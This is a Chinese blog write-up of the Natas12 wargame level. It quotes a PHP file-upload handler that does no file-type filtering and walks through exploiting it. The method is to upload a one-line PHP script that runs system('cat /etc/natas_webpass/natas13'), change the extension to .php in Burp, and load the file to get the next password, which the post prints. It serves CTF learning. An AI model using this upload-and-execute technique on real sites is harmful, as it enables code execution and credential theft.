Natas12 Writeup(文件上传漏洞)

Natas12:

文件上传页面,源码如下:

function genRandomString() {
    $length = 10;
    $characters = "0123456789abcdefghijklmnopqrstuvwxyz";
    $string = "";    

    for ($p = 0; $p < $length; $p++) {
        $string .= $characters[mt_rand(0, strlen($characters)-1)];
    }

    return $string;
}

function makeRandomPath($dir, $ext) {
    do {
    $path = $dir."/".genRandomString().".".$ext;
    } while(file_exists($path));
    return $path;
}

function makeRandomPathFromFilename($dir, $fn) {
    $ext = pathinfo($fn, PATHINFO_EXTENSION);
    return makeRandomPath($dir, $ext);
}

if(array_key_exists("filename", $_POST)) {
    $target_path = makeRandomPathFromFilename("upload", $_POST["filename"]);


        if(filesize($_FILES['uploadedfile']['tmp_name']) > 1000) {
        echo "File is too big";
    } else {
        if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path)) {
            echo "The file <a href=\"$target_path\">$target_path</a> has been uploaded";
        } else{
            echo "There was an error uploading the file, please try again!";
        }
    }
} else {
natas12-sourcecode.html

查看源码,发现没做过滤,只是把上传后的文件名及后缀名修改了,思路就是利用文件上传漏洞上传一个PHP文件读取密码。

1.构造一个简单的test.php文件,用于读取/etc/natas_webpass/natas13,代码如下。

<?php
system('cat /etc/natas_webpass/natas13');
?>

2.点击上传php文件,用burp拦截,修改name后缀为php,点击Go,上传成功。

3.URL访问返回的php页面,得到flag。

flag:jmLTY0qiPZBbaKc9341cqPQZBJv7MQbY
 
posted @ 2020-03-06 22:06  zhengna  阅读(443)  评论(0编辑  收藏  举报